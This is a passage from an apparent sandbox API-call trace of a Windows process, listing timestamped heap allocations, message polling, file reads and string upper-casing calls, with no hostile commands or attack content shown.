Size=0x38) returned 0x246d860 [0158.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1be8 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2678 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0158.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2678 | out: hHeap=0x25c0000) returned 1 [0158.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0158.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0158.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2678 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0158.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0158.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0158.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0158.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0158.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0158.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0158.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0158.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2678 | out: hHeap=0x25c0000) returned 1 [0158.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0158.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0158.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0158.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0158.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100000) returned 0x34a0020 [0158.698] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0158.699] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0xa1f8, lpOverlapped=0x0) returned 1 [0158.699] ReadFile (in: hFile=0x170, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0158.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0158.699] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0158.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0158.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa1f8) returned 0x24d7a58 [0158.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0020 | out: hHeap=0x25c0000) returned 1 [0158.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0158.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0158.701] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0158.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0158.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1be8 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2678 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa1f8) returned 0x24d7a58 [0158.702] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2678 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0158.702] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b5770 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2678 [0158.702] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0158.702] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b26f8 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b20a8 [0158.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfb8 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abdd8 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1f98 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2e0 [0158.703] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0158.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abfb8 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b26f8 [0158.703] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.703] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2738 [0158.703] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56f8 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abee0 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2738 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab298 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0158.703] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0158.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac210 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b26d8 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac078 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b26a8 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac198 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac120 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2758 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac138 [0158.704] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.704] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b26d8 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac078 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac210 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2758 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab088 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24abe20 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b26a8 [0158.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac198 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13b8 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab2c8 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac210 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b26d8 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac108 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac078 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b26a8 [0158.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac138 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.705] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.706] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.707] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.708] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee0) returned 0 [0158.709] PeekMessageW (in: lpMsg=0x8beee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 